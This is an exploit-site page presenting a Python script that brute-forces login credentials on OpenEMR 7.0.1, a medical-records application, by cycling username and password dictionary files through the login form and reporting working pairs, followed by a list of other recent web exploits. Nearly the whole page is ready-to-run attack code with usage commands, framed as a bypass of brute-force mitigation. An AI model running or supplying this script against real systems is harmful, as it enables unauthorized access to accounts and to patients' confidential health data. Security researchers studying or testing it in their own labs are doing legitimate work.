Openemr v7.0.1 authentication credentials brute force Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-05-02 | Type : webapps | Platform : php
This exploit / vulnerability Openemr v7.0.1 authentication credentials brute force is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows

'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''

import requests
import sys
import argparse, textwrap
from pwn import *

#Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))

parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u","--username", help="Username to Bruteforce for.")
parser.add_argument("-ul","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
print (f"Exploit Usage: python3 exploitBF.py -h")
sys.exit(1)

# Variable
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist

log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')

def login(Username,Password):
session = requests.session()
r = session.get(LoginPage)

# Progress Check
process = log.progress('Brute Force')

#Specifying Headers Value
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'Referer' : f"{LoginPage}",
'Origin' : f"{LoginPage}",
}

#POST REQ data
postreqcontent = {
'new_login_session_management' : 1,
'languageChoice' : 1,
'authUser' : f"{Username}",
'clearPass' : f"{Password}"
}

#Sending POST REQ
r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)

#Printing Username:Password
process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))

#Conditional loops
if 'Location' in r.headers:
if "/interface/main/tabs/main.php" in r.headers['Location']:
print()
log.info(f'SUCCESS !!')
log.success(f"Use Credential -> {Username}:{Password}")
sys.exit(0)

#Reading User.txt & Pass.txt files
if Username_list:
userfile = open(Username_list).readlines()
for Username in userfile:
Username = Username.strip()

passfile = open(Password_list).readlines()
for Password in passfile:
Password = Password.strip()
login(Username,Password)

Openemr v7.0.1 authentication credentials brute force


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Openemr v7.0.1 authentication credentials brute force Vulnerability / Exploit